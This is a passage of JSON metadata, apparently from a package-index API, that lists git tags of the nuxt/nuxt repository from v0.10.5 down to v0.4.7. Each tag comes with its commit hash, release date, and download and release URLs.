:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.4/manifests"},{"name":"v0.8.3","sha":"4895433d3383407dd243acc0718bc9fa33ad28ff","kind":"commit","published_at":"2016-12-08T10:43:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.3/manifests"},{"name":"v0.8.2","sha":"40e28de226dbefd24e228c801b28892ca91e33e4","kind":"commit","published_at":"2016-12-07T22:58:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.2/manifests"},{"name":"v0.8.1","sha":"78a2c5afe747c7009ff618a79f14ddf83c19efed","kind":"commit","published_at":"2016-12-07T22:44:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.1/manifests"},{"name":"v0.8.0","sha":"be5e8c118d1415e33031772daca422a0fae511bf","kind":"commit","published_at":"2016-12-07T18:43:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.0/manifests"},{"name":"v0.7.9","sha":"8801327db20c2e5daa594a7d8ad95d7a2a582a14","kind":"commit","published_at":"2016-12-04T18:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.9/manifests"},{"name":"v0.7.8","sha":"ddbffcc8af4393e14cc44daa94b4a27a21c6fadf","kind":"commit","published_at":"2016-12-01T18:09:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.8/manifests"},{"name":"v0.7.7","sha":"fdc430b23bac4a0cf86b0bc0da7828a573a0176d","kind":"commit","published_at":"2016-11-28T16:28:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.7/manifests"},{"name":"v0.7.6","sha":"53499f2a6b0ebf7514f984f6d81ce76ab9aaeb09","kind":"commit","published_at":"2016-11-27T17:46:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.6/manifests"},{"name":"v0.7.5","sha":"3ed1340d568c36f65bfe66618f9ac8119e8408de","kind":"commit","published_at":"2016-11-27T17:13:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.5/manifests"},{"name":"v0.7.4","sha":"bcf291b54761b64c271573e045e9275f189c3bea","kind":"commit","published_at":"2016-11-25T16:58:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.4/manifests"},{"name":"v0.7.3","sha":"cb1994319cd920b77181d852daf79a9c2c51b25c","kind":"commit","published_at":"2016-11-25T14:37:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.3/manifests"},{"name":"v0.7.2","sha":"4b9fb87c860f69d4b5044533aee0c16310b10aa1","kind":"commit","published_at":"2016-11-24T13:41:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.2/manifests"},{"name":"v0.7.1","sha":"d984c8803d9dd1e58c56a08b97f7d38ba5cb92b7","kind":"commit","published_at":"2016-11-24T12:16:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.1/manifests"},{"name":"v0.7.0","sha":"40515ac91a9e4ae5fd7b4a37c75de2843f6d3fbc","kind":"commit","published_at":"2016-11-24T00:47:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.7.0/manifests"},{"name":"v0.6.9","sha":"5b35834f42aa6cea3724f098787587a86ec6f4c3","kind":"commit","published_at":"2016-11-23T13:05:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.9/manifests"},{"name":"v0.6.8","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.8/manifests"},{"name":"v0.6.7","sha":"57b55dc5126ae271f3b87b2d3ffdac49055e355e","kind":"commit","published_at":"2016-11-22T23:47:31.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.7/manifests"},{"name":"v0.6.6","sha":"fc598ea66e1249645ed3677d8725efc1c048ba2d","kind":"commit","published_at":"2016-11-22T23:27:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.6/manifests"},{"name":"v0.6.5","sha":"2400fabceb3b76b756efc8ede2919a4ccb088345","kind":"commit","published_at":"2016-11-21T18:53:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.5/manifests"},{"name":"v0.6.0","sha":"edd0227e746c2ecde781915bd8c59e98f399439a","kind":"commit","published_at":"2016-11-21T13:15:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.6.0/manifests"},{"name":"v0.5.3","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.3/manifests"},{"name":"v0.5.2","sha":"b8436b067f8375bb91e4b99cc528661eaa27c43c","kind":"commit","published_at":"2016-11-20T11:23:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.2/manifests"},{"name":"v0.5.1","sha":"8cbbaeaf838e33bb6e23f06e15724b39042c5206","kind":"commit","published_at":"2016-11-20T10:37:53.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.1/manifests"},{"name":"v0.5.0","sha":"e48f8250a084202fbc492df55f13e3803e2b74cf","kind":"commit","published_at":"2016-11-18T13:45:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.5.0/manifests"},{"name":"v0.4.9","sha":"d4b8bc4f022459c976b41cb9845be38759a0481a","kind":"commit","published_at":"2016-11-18T09:38:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.9/manifests"},{"name":"v0.4.8","sha":"d928c9e5970e9d08eec61fe6770325d8c74e6d5b","kind":"commit","published_at":"2016-11-18T08:19:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.4.8/manifests"},{"name":"v0.4.7","sha":"49f67566c2d74a661421be1589279b316dcc9e49","kind":"commit","published_at":"2016-11-17T21:12:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.4.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.4.7","dependencies_pa